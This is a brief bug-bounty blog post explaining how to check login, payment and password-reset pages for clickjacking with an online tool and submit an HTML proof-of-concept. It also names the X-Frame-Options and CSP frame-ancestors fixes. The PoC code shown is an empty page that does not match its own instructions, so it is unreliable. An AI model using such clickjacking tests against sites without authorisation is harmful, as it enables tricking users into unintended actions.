How To Find Clickjacking Easily…

2 months ago 33

BOOK THIS SPACE FOR AD

ARTICLE AD

Hello guys today I will show you how to find clickjacking vulnerability easily.

Clickjacking is a type of security vulnerability where an attacker tricks a user into clicking something different from what they think they are clicking.

Imagine a hidden or invisible button placed on top of a regular button on a website. When you think you’re clicking to like a post or play a video, you’re actually clicking something harmful like giving permissions, sharing sensitive information, or making a purchase.

Note: Always make sure you find clickjacking vulnerability on sensitive endpoints like login page, registration page, payment page, password reset page, admin login etc…

Go to the target website and go to the sensitive endpoints like login, register, admin login, forgot password etc… and copy the url of each sensitive endpoints of the target website.Now go to clickjacker.io (I will add the link in the end) and paste your urls one by one.

Sorry I am at my day job at the moment so I will show this on my mobile browser. The steps are same you can do this on mobile or computer.

IF ITS VULNERABLE YOU WILL GET A RESULT LIKE THIS ON CLICKJACKER TOOL.

IF THE TARGET IS NOT VULNERABLE THEN THE OUTPUT WILL BE LIKE THIS

Add x-frame options headerAdd Content Security Policy (CSP) Frame Ancestors

COPY and paste the below HTML code:

<!DOCTYPE html>

<html>

<head>

<title>Clickjacking PoC</title>

</head>

<body>

</body>

</html>

If the target is vulnerable just copy the above code and change target.com to the real target you are hunting and save the file like poc.html and add this with your report and sent it to the triage team.

Thats it….byeeeee

#Clickjacking #WebSecurity #Cybersecurity #BugBounty #EthicalHacking #PenTesting #Vulnerability #AppSec #WebAppSecurity #Infosec #Hacker #BugHunter #SecurityResearch #OWASP #Exploit

Read Entire Article